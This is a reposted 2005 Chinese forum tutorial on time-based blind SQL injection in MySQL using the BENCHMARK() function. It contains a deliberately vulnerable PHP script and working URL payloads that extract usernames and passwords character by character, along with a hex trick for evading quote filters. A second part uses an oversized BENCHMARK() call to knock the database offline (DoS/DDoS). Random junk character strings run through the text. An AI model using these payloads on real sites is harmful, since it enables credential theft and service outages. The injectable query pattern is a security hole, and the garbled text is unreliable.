MYSQL中BENCHMARK函数的利用

admin

MYSQL中BENCHMARK函数的利用
7 ]; E4 m0 q* ?- R8 C1 T- s1 a本文作者：SuperHei
文章性质：原创
发布日期：2005-01-02
# ~8 Y' k$ O' `3 ?完成日期：2004-07-09
1 u  O/ b  [# E# A第一部

' R7 B4 q* s' q利用时间推延进行注射---BENCHMARK函数在注射中的利用

一.前言/思路

$ z: l. z9 z* M' H' R' b- }, G　　如果你看了angel的《SQL Injection with MySQL》一文，你有会发现一般的mysql+php的注射都是通过返回错误信息，和union联合查询替换原来查询语句中的字段而直接输出敏感信息，但是有的时候，主机设置为不显示错误信息：display_errors = Off 而且有的代码中sql查询后只是简单的对查询结果进行判断，而不要求输出查询结果，我们用上面的办法注射将一无所获。我们可以采用时间推延来进行判断注射了。

  e7 j# j3 M; X! W　　本技术的主要思路：通过在构造的语句用加入执行时间推延的函数，如果我们提交的判断是正确的，那么mysql查询时间就出现推延，如果提交的判断是正确，将不会执行时间推延的函数，查询语句将不会出现推延。这样我们就可以进行判断注射。
% C% @! b6 G: |5 m
二.关于BENCHMARK函数
/ k/ W8 C. @0 J
: J9 E1 A3 m6 p0 A4 Y8 b* S　　在MySQL参考手册里可以看到如下描叙：


--------------------------------------------------------------------------------

% r4 K/ C2 C4 V7 J& RBENCHMARK(count,expr)
BENCHMARK()函数重复countTimes次执行表达式expr，它可以用于计时MySQL处理表达式有多快。结果值总是0。意欲用于mysql客户，它报告查询的执行时间。
3 v4 F: s7 k5 L3 F# ]' z; `mysql> select BENCHMARK(1000000,encode("hello","goodbye"));
+----------------------------------------------+
| BENCHMARK(1000000,encode("hello","goodbye")) |
- |7 M5 i+ j7 H- G% T0 s7 a+----------------------------------------------+
. S% e6 t9 [/ F| 0 |
+ L1 N3 G* `% C! U" I. s: C+----------------------------------------------+
( k  b& F9 F( H1 row in set (4.74 sec)
) V2 \/ Z3 L- h
& V2 w, {' L4 _8 ~/ L4 z, [报告的时间是客户端的经过时间，不是在服务器端的CPU时间。执行BENCHMARK()若干次可能是明智的，并且注意服务器机器的负载有多重来解释结果。


' t5 I& K* O6 C# A1 A--------------------------------------------------------------------------------

　　只要我们把参数count 设置大点，那么那执行的时间就会变长。下面我们看看在mysql里执行的效果：

1 e4 w& f9 [  T, G$ k6 ?9 l: o+ V/ Gmysql> select md5( 'test' );
+----------------------------------+
| md5( 'test' ) |
+----------------------------------+
; w6 J# ^4 [! ^* f7 ?. T| 098f6bcd4621d373cade4e832627b4f6 |
5 @6 h" K1 q' _% O; }" g0 S. w+----------------------------------+
% v$ P; P# M2 l8 q4 ?6 c5 H: x1 row in set (0.00 sec) 〈-----------执行时间为0.00 sec
8 {( Q+ s. I& P! l9 \
mysql> select benchmark( 500000, md5( 'test' ) );
+------------------------------------+
, F1 P* [' J9 H- V| benchmark( 500000, md5( 'test' ) ) |
+------------------------------------+
| 0 |
+------------------------------------+
! F" s* a7 Q2 W& r, s1 row in set (6.55 sec) 〈------------执行时间为6.55 sec

" y9 Y1 a* G0 }4 i' N& ~
　　由此可以看出使用benchmark执行500000次的时间明显比正常执行时间延长了。

- b8 f. |+ A; ]. i# o( S* X三.具体例子
7 p& D5 q# n9 G# e) Y" S, \
' g: l# h; C6 C$ K! H( {( D2 O4 ^/ K　　首先我们看个简单的php代码：

< ?php
+ `2 h1 k) X( M) W' C8 j$servername = "localhost";
0 c# E/ u" y4 V4 k  \% i$dbusername = "root";
$dbpassword = "";
$dbname = "injection";
2 \+ F$ ^/ B7 ?, S2 z
8 M. |! @/ k6 N0 x6 u: z4 Gmysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
  z" }6 Q" u7 P; m3 b3 D  B' K
$sql = "SELECT * FROM article WHERE articleid=$id";
$result = mysql_db_query($dbname,$sql);
$row = mysql_fetch_array($result);

if (!$row)
{
exit;
}
?>

/ }) l! [" w; k$ e+ O) V
　　数据库injection结构和内容如下：
3 S7 y: v2 x! `
3 U- T5 W% U5 o: ]# 数据库 : `injection`
; x0 h3 o6 G1 s#

# --------------------------------------------------------

0 g# l/ C: L% c) H# ?4 r3 f6 _#
# 表的结构 `article`
#

CREATE TABLE `article` (
3 `% u7 f, W& R- K( N( g`articleid` int(11) NOT NULL auto_increment,
`title` varchar(100) NOT NULL default '',
`content` text NOT NULL,
7 `1 W+ ~2 D& J% mPRIMARY KEY (`articleid`)
4 y  S0 b  j2 N6 x) TYPE=MyISAM AUTO_INCREMENT=3 ;

; F+ R0 O0 G% t+ M- A#
# 导出表中的数据 `article`
1 s! A  z: a) {0 d7 ~9 n9 ^#

8 S' }9 U' `' v, [! i! g* UINSERT INTO `article` VALUES (1, '我是一个不爱读书的孩子', '中国的教育制度真是他妈的落后！如果我当教育部长。我要把所有老师都解雇！操～');
4 ~$ N: [+ h$ I; b. C0 S$ u$ c( MINSERT INTO `article` VALUES (2, '我恨死你', '我恨死你了，你是什么东西啊');

# --------------------------------------------------------

#
# 表的结构 `user`
) h6 l* R9 Q7 w0 A$ R#
! u  P0 ]9 g: G6 ]: t* D) W! k
- H% P9 J# ]. xCREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
) z7 @4 {2 g5 r, O& ~3 ^4 S8 lPRIMARY KEY (`userid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;

$ ^5 b! q! c3 a0 y, n- Y# n#
7 B2 `0 f( r" H  U: W# 导出表中的数据 `user`
1 D  {; D( C9 N3 o2 G% A#

INSERT INTO `user` VALUES (1, 'angel', 'mypass');
! _  L) u+ Z/ x$ YINSERT INTO `user` VALUES (2, '4ngel', 'mypass2');
( M2 ^+ }% E/ c7 X# o

: X% r2 b( S" |6 @9 `1 O　　代码只是对查询结果进行简单的判断是否存在，假设我们已经设置display_errors=Off。我们这里就没办法利用union select的替换直接输出敏感信息(ps:这里不是说我们不利用union，因为在mysql中不支持子查询)或通过错误消息返回不同来判断注射了。我们利用union联合查询插入BENCHMARK函数语句来进行判断注射：

id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*
0 o" \8 R' s! T# X2 R/ G7 m

　　上面语句可以猜userid为1的用户名的第一位字母的ascii码值是是否为97，如果是97，上面的查询将由于benchmark作用而延时。如果不为97，将不回出现延时，这样我们最终可以猜出管理员的用户名和密码了。 大家注意，这里有一个小技巧：在benchmark(500000,md5('test'))中我们使用了'号， 这样是很危险的，因为管理员随便设置下 就可以过滤使注射失败，我们这里test可以是用其他进制表示，如16进制。最终构造如下：
3 m* O2 c. W: Z9 ]. D
http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,benchmark(500000,md5(0x41)),1%20from%20user%20where%20userid=1%20and%20ord(substring(username,1,1))=97%20/*

0 t( A+ t1 j6 L2 V% N
　　执行速度很慢，得到userid为1的用户名的第一位字母的ascii码值是是为97。

　　注意：我们在使用union select事必须知道原来语句查询表里的字段数，以往我们是根据错误消息来判断，我们在union select 1,1,1我们不停的增加1 如果字段数正确将正常返回不会出现错误，而现在不可以使用这个方法了，那我们可以利用benchmark(),我们这样构造 union select benchmark(500000,md5(0x41)) 1,1 我们在增加1的，当字段数正确时就回执行benchmark()出现延时，这样我们就可以判断字段数了。

第二部

% ~) F9 r  f5 d! X利用BENCHMARK函数进行ddos攻击

1 J7 {0 I. k9 v9 `, ~4 m; R4 H　　其实思路很简单：在BENCHMARK(count,expr) 中 我们只要设置count 就是执行次数足够大的话，就可以造成dos攻击了，如果我们用代理或其他同时提交，就是ddos攻击，估计数据库很快就会挂了。不过前提还是要求可以注射。语句：
" k+ k- L0 L5 l1 J% i' I
http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0x41))


, _) b. U* ^) Z3 L2 ?小结

　　本文主要思路来自http://www.ngssoftware.com/papers/HackproofingMySQL.pdf，其实关于利用时间差进行注射在mssql注射里早有应用，只是所利用的函数不同而已（见http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf）。关于mysql+php一般注射的可以参考angel的文章《SQL Injection with MySQL》。

7 D% V& E% A  p* w4 {$ O9 C( F